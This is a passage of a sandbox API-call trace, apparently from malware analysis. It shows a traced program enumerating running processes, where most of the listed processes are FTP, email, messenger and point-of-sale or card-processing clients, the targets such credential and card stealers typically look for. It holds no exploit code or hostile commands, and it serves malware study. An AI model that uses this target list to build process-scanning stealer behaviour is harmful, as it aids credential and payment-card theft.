th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0280.750] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0280.752] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.754] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0280.755] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0280.756] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.758] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0280.759] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0280.761] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0280.763] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0280.765] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0280.766] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0280.768] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0280.769] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0280.771] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0280.772] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0280.774] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0280.775] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0280.777] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0280.906] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0280.908] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0280.909] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0280.911] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0280.912] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0280.913] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0280.915] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0280.916] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0280.918] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0280.922] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0280.924] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0280.925] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0280.927] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0280.928] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0280.930] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0280.932] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0280.933] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0280.938] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0280.939] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0280.941] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0280.943] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0280.945] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0280.946] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0280.948] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0281.011] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0281.014] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0281.015] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0281.017] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0281.020] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0281.021] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0281.023] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0281.025] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0281.026] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0281.028] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0281.033] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0281.034] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0281.036] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0281.038] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0281.039] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0281.041] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0281.043] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0281.048] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0281.050] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0281.051] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0281.053] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0281.054] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0281.056] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0281.058] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0281.131] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0281.132] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0281.134] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0281.135] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0281.147] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0281.149] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0281.150] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0281.152] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0281.158] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0281.159] CloseHandle (hObject=0x2170) returned 1 [0281.159] Sleep (dwMilliseconds=0x64) [0281.279] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0281.290] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.292] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0281.294] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0281.298] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0281.299] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0281.301] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0281.302] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0281.304] 